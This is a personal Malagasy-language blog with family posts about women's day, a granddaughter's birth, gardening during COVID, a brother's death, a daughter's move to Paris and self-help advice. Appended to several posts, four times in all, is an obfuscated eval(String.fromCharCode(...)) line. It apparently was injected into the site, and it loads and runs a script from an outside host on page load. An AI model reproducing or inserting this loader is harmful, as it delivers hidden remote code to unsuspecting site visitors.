Blaogin’ny Namana Serasera weblog

Reny, Renibe,Anabavy vehivavy e!

Andron’ny 8 martsa androany, asa raha mbola misy lanjany ihany izany vanim-potoana izany eo @ mpiara monina na tsia. Fa raha tsy nitolona ry Simone Veil sy ny tariny taty Frantsa dia tsy ho tahaka izao ny fomba fiainan’ny vehivavy raha ny eto Frantsa fotsiny no ho resahiko aloha.

Tsy mora ny mitondra tena ho vehivavy, satria na inona na inona no ataonao, dia tsy maintsy hisy hatrany ny kiana ho azonao. nefa mety io ho kiana hanatsarana zavatra, ary mety ho kiana koa fialonana, satria dia tsy miala amintsika olombelona izay fialonana, na fiatsaram-belatsihy izay.

8 mars hoy aho anio dia mihetsika daholo ny fikambanana rehetra mampiseho ny asa vita sy izay ho hatao rehetra, tsy ho tanisaiko fa efa hitanareo eny rehetra eny daholo, (ity moa ahy dia izay tiako apetraka eto).

Mbola tsaroako foana ilay nandika ilay boky “Monologue du vagin” ho @ teny malagasy fa dia fihomehezana ny an’ny troupe des zazavavy ….

Asa manao ahoana re raha vakiana @ malagasy iny boky iny izao e! ho menatra ve ny mpamaky sa ny mpihaino e!, tiako ho hita be ny fihetsiky ny olona izany, Iza re no ho afaka hanao izay miaraka amiko e! ho ataoko izay miaraka @ i Tatisy atsy ho atsy enga anie…..

 

Faly koa aho fa renibenjaza moa izany e… afaka mifanakalo aminy na dia tsy eo akaikiny aza fa afaka manao izany @ alalan’ny téléphone…

afaka mampianatra azy ny fiainana, ho mahaleo tena, tsy hiankina na @ iza na @ iza, hahay hanaiky ny fahasamihafana, hahay hijoro @ heviny ihany koa….

mbola hitohy

Tonga kely ny inspiration androany nahita fa hoe nisara-panambadiana ny mpivay iray izay anisan’ny manan-karena be eto an-tany. Tsy iza izany fa ry BIll sy Melinda Gates, izy ireo moa dia anisan’ny mpanao asa soa maneran-tany ihany koa, ny tiako ho raiketina eto fotsiny dia hoe manana fondation i Melinda, izay miasa betsaka tokoa any Afrika eo amin’ny sehatra ara-pahasalamana, tsy mba sakana ho azy izany hoe misaraka @ vadiny izany na dia efa 27 taona nivadiana ary mety ho efa ho maherin’izay nifaneraserana aza izy mivady ireo. Ny an’ny tatsinanana tokoa dia tsy mba sakana ho an’ny fiaraha miasa ny fisarahana, nanambara mantsy izy ireo fa dia mbola hitohy hatrany ny fiarahan’izy ireo miasa fa ny fiainan-tokan-trano no mijanona hatreo. 

 


598 comments

Taona 2020 mifangaro

Tonga tsy nampoizina  i Alynah Fitiavana Landy RAJAONARISON, herintaona taorian’ny nahalasanan’i Hoby tokoa dia tonga i Alynah, tonga mameno ny banga eo aminay mianakavy kely. 

Fahatairana aloha ny ahy raha vao nolazain’i Maeva aho fa miandry vohoka izy, somary diso fanantenana kely ny amin’ny ho aviny aho, nefa moa dia nilaza izy fa safidiny ilay toe-javatra fa tsy hoe tsy nampoiziny akory. Efa lehibe tokoa izy ary dia mahalala ny mety sy tsy mety fa dia ny nanampy azy teo amin’ny lafiny ‘logistique’ sisa no anjarako, satria dia efa maty paika maty lamina daholo ny handraisany ny zanany.

Nandritra izay fotoana izay koa moa dia nisy koa ary mbola misy moa hatreto ity valan’aretina COVID19 ity izay maneran’tany tokoa ary dia mandripaka aina maro. Tsy vitsy ny namoy havana na namana akaiky ny manodidina ahy ary na ny tao anatin’ny fianakaviako azy dia nahitana izany famoizana izany ihany koa.

Afangaroko eto daholo aloha izay ato an-dohako fa efa ela aho no te hanoratra fa tsy nety tafiditra fa nisy olana kely teto, 

nandritra iny taona 2020 iny dia nifandimby ny fahazahoan-dalana mivezivezy sy ny tsy fahazahoan-dalana na ny couvre-feu, nohon’ny antony fitandrovana ny fahasalamana moa izany. Tahaka izany koa ny fahazahoana miasa, ary dia nalalaka tamiko ny fikarakarana ny zaridainako, Voadioko ny kirihitra teo an-tokontany, faly aho, ny asa tao-trano ihany koa dia nandroso niadana teo koa.

Nahavita ary nahavokatra anatsonga, anamamy dia, katsaka, ovy, voatavo karazany 3 aho ary radis, persily, kotmila, solila, haricot-vert, voatabia karazany efa ho 4 ary ireny tsy dia fihinako an-davan’andro ireny. Ny amehezako azy dia variana aho fa kay mahavokatra ny tanako rehefa ampiasaiko e…. faly aho e!

Teo ihany koa ny fikarakarana ny sakafo batemin’i Achille izay zafin’ilay namako akaiky, ny volana Avril 2020 moa izany e, faly ny nasaina, tsy nampiozin’ny vahiny satria da asatananay sy Maeva daholo ny teo, ny vahiny dia menasofina daholo, Ny mofomamy ihany no tsy asa-tananay mianaka, 

 

mbola hitohy 


No comments

Foy ny atody e!!! hary elatra ny ankizy

Ela izay,

tsy haiko hoe ahoana ny hanombohako azy, fa dia hoe hary elatra ny ankizy… mahafaoka zavatra betsaka izay,….

Ny volana novembre 2018 i Maeva no nifindra lasy tany Paris Ile de france, tsy mora anefa vao tonga t@ izany izahay, vita ny fanadinana Bacc taty Lille ny été 2018 dia nandeha naka rivotra niaraka t@ fianakaviana malagasy namanay aty Lille ho any Madagasikara izy. Nahita izany hoe tena fialan-tsasatra izany tokoa, satria dia tao Antananarivo, dia avy teo lasa tany Toamasina, ary dia nifarana tany Mahajanga ny diandry zareo t@ izay…..

Nony niverina avy tany izy dia nijerijery fianarana mety hataony aloha….. tsy tiany ny hifanerasera @ ankizy mpiara mianatra taminy taty Lille koa dia nanapa-kevitra izy fa ho any an-drenivohitra hono…. ohatran’ny nataoko izaho reniny sy ny rahavavin-dreniny izay reniny à batemy,

Rafitra aza izahay 3 mianaka nitady trano ho azy, nahita tokoa fa dia feno fitaka, ka dia tsy nidirana akory…. nahita formation tany anefa ilay zanako ka dia tsy maintsy nijanona tany ihany, ary dia tao @ Hoby izay reniny   @ batemy izy no nitoby mandra-hoe pahita trano aloha. samy tia fety izy mianaka ka dia nifankahazo tsara, fa na izany aza eo an-daniny @ maha zaza an i Maeva dia nisy ihany tsy fitovian-kevitra matetika teo à izy mianaka, toy ny fanasana lovia rehefa avy misakafo na koa ny fampirimana ny trano, na koa ny ora fodiana ao an-trano, ka matetika miantso ‘polisy’ aty Lille ny iray @ izy mianaka, dia manao mpanelanelana indray aloha ny tenako.

Indrisy anefa fa dia zara raha niray toerana izy mianaka satria dia nilaozan’i Hoby haingana loatra izahay….. lasa tsy niverina intsony izy, lasa tsy ho hay antsoina ihany koa….

Tampoka be taminay tokoa ny fahalasanany, na izaho aza tahaka ny tsy nino raha tsy nahita azy teo an-tokontaniny….. tsy hiverina @ iny intsony aho fa mbola misy fery tsy mety sitrana ao anatiko ao,Misaotra ny Tompo aho nanome azy anay nandritra izay 45 taona izay…. ny vola famangiana nomena anay dia nahatontosana zavatra maro @ anaran i Hoby, na teo anivon’ny vianakaviana na eo anivon’ny firenena … tsy hitsanga menatra ny anarany…. nahavita fambolen-kazo in 2 miantaona aho, ny voalohany dia niarahana nanatontosa niaraka t@ ireo mpanakanto tany antoerana teny @ tanindrazanay, any Amboniriana, ary ny faharoa kosa dia niarahana t@ association tetezana sy ny namana serasera Dago teny Ambohidratrimo, Maniry tsara ny eny ambanivohitra satria dia misy mpiahy, ary misy mpanondraka, raha ilaina izany, ny teny Ambohidratrimo kosa dia somary nisy ‘perte’ kely satria tsy dia nisy nanara maso nandritry ny fambolena ka dia voatery i Maminiriana mivady no nijery sy nanarina ny tsy mety volana taty aoriana, fa iriana fa haniry tsara ihany koa ireo….

Santatra ambava rano iny fa ny tanjona dia ho isan-taona dia hiaraka hamboly hazo sy handrakotra io firenentsika io i Maeva satria raha voafidy ho Miss Madagascar en France 3ème dauphine izy dia io no foto-drafitrasa nosakainy hatao. Izay no no izy satria hainy fa efa misy namana aho afaka miaraka miasa aminay eny an-toerana, ka dia manohy izay ihany izy. (efa niresaka izay ihany moa aho teo aloha)

Ankehitriny dia any  @ 92500 izy no mipetraka ary dia isaorako eram-po eran-tsaina ireo mampiantrano azy tokoa izany, tsy vitan’i Maeva mantsy ny hipetraka irery ao @ tranon’i Hoby…

(mbola hitohy)

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


167 comments

Fandalovana ny ety an-tany

Tsy hay ny hiteny, vahotra ny lela, fa dia izay no lahatra ary dia ekena satria dia Izy Tompo no nanome, ary Izy ihany koa no maka, isaorana Azy ny 45 taona nomeny anay niarahana niriaria taminy,

Veloma razandriko izany

Izao aho vao miverina mamaky tsara ny soratra teny fampiononana nosoratan’ny tapaka sy namana maro, ka anisan’ny nanohina aho tokoa ity misy rohy ahitana an’i Hoby ity

https://www.facebook.com/groups/108170892853387/permalink/790080881329048/

tena hoe tsy lasa izy fa ohatran’ny hoe mbola ho avy hihira na hiantso ahy hanontany hoe ahoana nety ve ny poziko, dia ho avy aho hamaly hoe ny artiste ve hanontany pozy izany moa fa izay ataony eo dia mety foana, hihihi misy mpankafy foana iny na pataloha rovitra aza anaovany….. eeehhhh, tsy misy mpanontany izay intsony aho ity rey olona annn… malahelo ilay zandriko aho izany e!!!


506 comments

Fialan-tsasatra 2018

Miarahaba indray

 

Ela izay tsy nanoratako izay, betsaka anefa ny mila ho raiketina an-tsoratra mba ho tadidiana…….. Mihaino vavaka sy Mamaly vavaka ny Tompo ka deraiko ny Anarany. Mbola tsy mety tapitr’ohatra anefa ny zanak’olombelona fa dia velon-kataka lalandava. Mitady ny tonga lafatra ety an-tany hatrany aloha.

 

Mety diso angamba ny loha teny nataoko io fa raketiko ato fotsiny mba tsy ho adinoko ny zavatra nataoko t@ ity fotoam-pialan-tsasatra 2018 ity.

Niaraka t@ i M Chretien-Payen nisintaka kely aho, nihazo an’i Bretagne izahay ary avy teo dia nijanona tao Ouistreham tany badde Normandia, nahafinaritra ny fotoana niarahana naharitra 10 andro teo ho eo ny nandehanako tany ary 4 tena fotoana mamy tokoa.  Efa fanaonay ihany ny misintaka kely tahaka izao fa ity kosa dia tena sady tsy nisy asa nanelingelina ary tsy nisy fotoana novonjena ka tena izay ilay atao hoe miala sasatra.

Nony tafaverina an-trano moa aho dia anjaran’ilay zanako indray no nandeha. Nihazo irery ny tanindrazana izy, fa dia nampitaintaina tokoa satria dia narary teny am-pisidinana ary nilàna fikarakarana manokana mihintsy, (MCE). Tsy misy atahorana hoy ny cardiologue fa mila fanaraha maso fotsiny rehefa tafaverina. nahitan’ny dr tataka kely moa akaiky ny fony any ‘fissure mitrale) fa dia mbola afaka mitsabo aloha isika izao, tsy misy atahorana ny aminy. Nizotra tsara ihany koa ny fialan-tsasatra nataony tany na dia nanao mazan-doha aza ka niafara t@ aretin-kibo izany. Fady anay mantsy any ny mandeha izany Gastro Pizza e…. resto be zaroa e…. zaria eee…. ny anay dia ny tsotra sy madio ary ara-pahasalamàna ihany hihihihi anatra ho azy tsara izay hihih fay tsara mihintsy niaingitraingitra ka nitsapa ny vokany….

Taty Fr kosa moa dia nihaona daholo ny zanaky ny mpiray tampo @ RAJAONARISON, izay natao tany Liège, nahafinaritra fa dia niaraka nandritry ny WE izahay ary dia nisy koa fiarahana nandeha teny amoron-dranomasina avy teo…..

 

Farany dia andraso aloha rehefa vita sonia dia teneniko kann, hihih aoka aloha izany ho @ herinandro indray ooooeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


61 comments

Fantaro ilay maha ianao anao, sa ve hoe mby aiza ianao?

Ny voalohan-teniko dia hoe toy ny lolo isika, ka afaka miofo, mivoatra ihany koa fa tsy natao ho very fahalalana akory.

Ampahatsiahiviko etoana ilay fomba fisainana milaza hoe :” Avelao ny nofy hanova ny zava-misy fa aza avela kosa ny fiainana no hanova ny nofinao na izay ho kinasanao” Eto dia voalohany aloha dia mila fantarinao hoe “iza tokoa ianao”, satria raha tianao ny hiaina io nofy ho lasa fiainana io dia mila hentitra amin’ny tenanao aloha ianao, mila fantarinao hoe hatraiza no fetra zakanao, tantinao ary hivononanao hatrehina marina tsy amin-tahotra.

Amin’izay fahafantaranao ny tenanao izay dia tsy tokony hisy fetra izay ho kasainao, avelao ny nofinofinao hamaritra hoe iza ilay TOKONY ho ianao , farito, ary raiketro an-tsoratra izany ary ataovy taza-maso matetika, mba ho lasa tarigetra mihintsy aza. Raiketro ao ny vinavinam-piainana tianao hiainana, ny zavatra sahinao hatao nefa tsy vitanao hatreto, na hiova fiainana mihintsy az atsy mampaninona fa fandalovana ihany ny antsika ety koa aleo iainana dieny izao izay nofinofy izay,

Rehefa vitanao izao, dia mivononà hiaina io fiovana io @ izay. Azo atao hoe fiovana na koa fivoarana izy eto, tsy misy hoe fahatarany izany eo @ fanovana fiainana na famindra hoy isika, ny zavatra rehetra dia miainga @ fanapahan-kevitra hentitra. Tongotra mby an-dakana hoy isika izay, ka tsy hiverina aoriana intsony. Mila iainanao @ izay ilay nofinao teo aloha, angony daholo ho eo am-pelantananao ny fahaizana manao izany, manatona olona na tranon’asa ahafahanao mahazo ny ilaina momba izany (raha asa dia mila fanampiana ianao @ “reconversion”, dia mila “formation” vao2 izany), Miova izany eto ny rivotra iainanao indray, Fantaro fa tsy fahalemena akory ny fiovana fa fivoarana kosa, ny traikefanao sisa no andrasana.

Azo ampiharina ihany koa izany eo @ fiainana manokana, ohatra raha mbola mpitovo ianao dia inona no tianao hitondrana ny fiainanao ho avy, hijanona ho mpitovo sa mikasa ny hanorina tokan-trano, ary raha efa manana izany indray dia ny fanontaniana mipetraka dia hoe moa ve manao ny mety sy azo atao aho hahamafy orina ilay voady izay nataoko, sa mila misy ezaka tokony hataoko haha mamy indray ilay ankany, na koa hoe sao tonga @ tsotsory mamba hisarahana ny fiarahanareo. Fanontaniana maro no mibosesika an-doha rehefa tonga ilay fotoana ilaina fandinihan-tena izay, ka tena mila olona vonona ny hiatrika izany tokoa fa tsy manisy saron-tava fotsiny ihany. Eto anefa dia tsy ianao ihany no ho voakasik’ilay fiovana fa ny olona izay miaraka aminao ihany koa, (faire une rétrospective de la vie pour mieux rebondir), ka mila mandinika tsara ianao hoe vonona hiatrika izay fiovana izay tokoa ve.

Rehefa tontosa ireo dingana ireo dia mila mino @ izay ianao. Mino ilay nofy lasa fiainana iainana. Mino fa vitanao tokoa ilay fiovana, mety hisy ny sakana, mety hisy ny tsy ho fahataontosana am-boalohany, fa tsy tokony ho kivy ianao. Hisy; ary enga anie hisy ihany koa ny hitsikera izay fiainanao vao2 izay, aleo hisy izany mba hahaizanao miaro ilay nofinao lasa tena izy. Aza mora ketraka ny @ izany ka hanenina, ny nenina tsy mba eo aloha hobanjinona hananatra fa any aoriana hatrany, koa raiso ny hoavinao ary iaino aam-pifaliana na inona na inona mitranga eo. ianao no efa nisafidy ilay nofy ho fiainana ka anao ny mikolokolo azy hamelana sy handrobona indray.

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


62 comments

Mihamandroso ny taona

Isika ety an-tany dia tsy ho azo iodivirana mihintsy fa tsy maintsy +1 isan-taona ny taonantsika. Ezahana ny ho tojo ny lavitra indrindra , asa moa tsy tsaroako firy taona izao ny olombelona lava andro indrindra eto an-tany. Fa ireto misy torohevitra kely, teny atsipy mba hahalavorary izany fandrosoan’ny taona izany, mba tsy ho adin-tsaina ho antsika izany hoe mitombo indray ny taona, tsy tomombana akory ny ho tanisaiko eto, mety misy tokony ho ampiana na hatsaraina fa ataoko fiandry ato ireto ary ho tsidihiko mandrakariva, ary avelako ho anareo ihany koa:

 1. Manàna fisainana feno hafatoniana sy madio eo @ fiainana (mba hialàna @ stress/ rarin-tsaina lava, hisorohana ihany koa à aretim-bavony mety hanjo)
 2. Aza dia manahy ny @ ho avy (hihihi izaho anefa dia mpitari-bato vilam-bava ggrr) satria hoy tokoa ny baiboly hoe (tsy haiko aiza ho aiza ann) na ny voron-kely aza tsy miasa nefa misy mpiahy
 3. Ezaho ny manao izay zavatra mahafalifaly ny saina sy fo ankoatran’ny asa sy ny andraikitra samihafa
 4. Aza mandainga à tenanao (ny hafa azonao andaingana fa tsy ny tenanao mihintsy satria dia miverina @ ilay n°1 isika,
 5. Ianao ihany no herin’ny tenanao, aza mba miantehitra @ olona hafa mihintsy, raha te hahazo fahafaham-po tanteraka fa ho diso fanantenana ianao
 6. Tiavo ny manodidina anao araka ny fanirianao fa tahaka izay ihany koa ny hitiavan’ireo anao
 7. Mitiava tsy misy tambiny
 8. Mianàra mamela heloka, (ppfff mpitari-bato vilam-bava hatrany ny aty…) aza entina masoandro maty ny hatezerana
 9. Aza manaratsy mihintsy ny tenanao, ilaina ny fahamatorana fa mba mila mihomehy ny tenanao ihany koa indraindray, fanitsiana ny diso tsy mety mila arenina izay
 10. Aza mitsahatra ny mianatra, fa ny fiainana dia fianarana lalandava (mahatsiaro ilay reniko aho eto….)
 11. Manàna fahatokisana ny tenanao fa izay no andrin’ny ho avinao
 12. isaory lalandava ilay mpahary sy mpandahatra fa izy no naha toy izao anao,

Tarigetrako ireo ary zaraiko aminareo, kofehy mitana ahy tsy ho lavo ihany koa ireo, haiko misy tsy ampy fa ho ampiako miandalana eny ihany.eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


32 comments

Sao mahasoa

Inona ny tokony hatao raha te hanana na te hanatratra tanjona ianao:

 

Isika rehatra izao dia mikatsaka ny hahazo tombontsoa eo @ fiainana avokoa, ary vao teraka isika dia misy ilay fomba fitenintsika hoe “samy nosoran-dreniny menaka” daholo. Midika izany fa ny Menaka na solika dia natao hampiodina ny fiainana, natao indrindra koa hampisosa ny fiainana mba tsy hisy rahoraho eo aminy fa hihodina soa ny milina rehetra tsy hisy ny sakana.

Rehefa vita ny fianarana fa tsy ny fanabeazana satria ny fotoana fanabeazana dia tsy mba mety tapitra, fa ny fianarana any an-dakilasy kosa ilay fanovozana na fandratoana fianarana dia mety hisy fetrany ihany, nefa moa raha tiana ny hanohy izany dia mety tsy hisy fetrany ihany koa io, ka hoy aho hoe, rehefa tonga eo @ ilay fotoana hijabahana @ asa fameloman-tena aza ianao dia indreto misy toro-hevitra vitsivitsy mety hahasoa anao.

 1. Voalohany aloha dia ezaho ny hanana tanjona eo @ fiainana. Izany hoe isika rehetra ireto dia tsy miaina fahatany fotsiny ety an-tany, fa samy manana ny diantsika avy nefa dia samy manana lalana ahatongavana @ izay tanjona izay isika, fa ny tena zava-dehibe dia ilaina abaribary izy io aao anaatinao ao hoe ity ny ahy ny tanjoko, ohatra tiako ny hanana zanaka hendry, na koa hanana trano be sy vady tsara, ary asa……(ambition)
